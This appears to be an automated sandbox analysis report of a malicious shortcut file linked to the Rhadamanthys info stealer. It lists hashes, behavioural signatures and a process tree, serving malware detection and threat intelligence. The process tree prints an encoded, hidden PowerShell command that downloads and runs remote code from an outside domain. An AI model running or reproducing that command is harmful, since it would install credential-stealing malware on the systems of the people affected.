Analysis
-
max time kernel
95s -
max time network
205s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-04-2024 08:57
Static task
static1
Behavioral task
behavioral1
Sample
DOC527 - 527527.lnk
Resource
win7-20240319-en
Behavioral task
behavioral2
Sample
DOC527 - 527527.lnk
Resource
win10v2004-20240226-en
General
-
Target
DOC527 - 527527.lnk
-
Size
9KB
-
MD5
8f67aaa7b8bf4df78de954a16bcf67ca
-
SHA1
2cedea1467518ab950820767b6f546344d228305
-
SHA256
b8a5cb1a0bc2ddd5b12f29781391ce38806b8dd0af28a0612d71a58063250ae8
-
SHA512
09519377b6dbedb528e4c96342b4c28ad71e2a286bb61866daea52d8a657969e4d53685cc14e122e8f3eb24e9ca5e0da6d77b2786d502b1b9a056c7154e83934
-
SSDEEP
192:8z55hm3MSBf6OY1tvnT1wEuz4+nCWLFf3m/9h0yAE7oxMdPDTJvs3DoTNxHJ6:u5vcMS5otvnT1w7p9WIBE7UkpoyHJ6
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2396 created 2652 2396 powershell.exe sihost.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 2396 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exedialer.exepid process 2396 powershell.exe 2396 powershell.exe 2396 powershell.exe 2396 powershell.exe 4308 dialer.exe 4308 dialer.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2396 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2088 wrote to memory of 2396 2088 cmd.exe powershell.exe PID 2088 wrote to memory of 2396 2088 cmd.exe powershell.exe PID 2396 wrote to memory of 4308 2396 powershell.exe dialer.exe PID 2396 wrote to memory of 4308 2396 powershell.exe dialer.exe PID 2396 wrote to memory of 4308 2396 powershell.exe dialer.exe PID 2396 wrote to memory of 4308 2396 powershell.exe dialer.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2652
-
C:\Windows\system32\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4308
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DOC527 - 527527.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2396
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82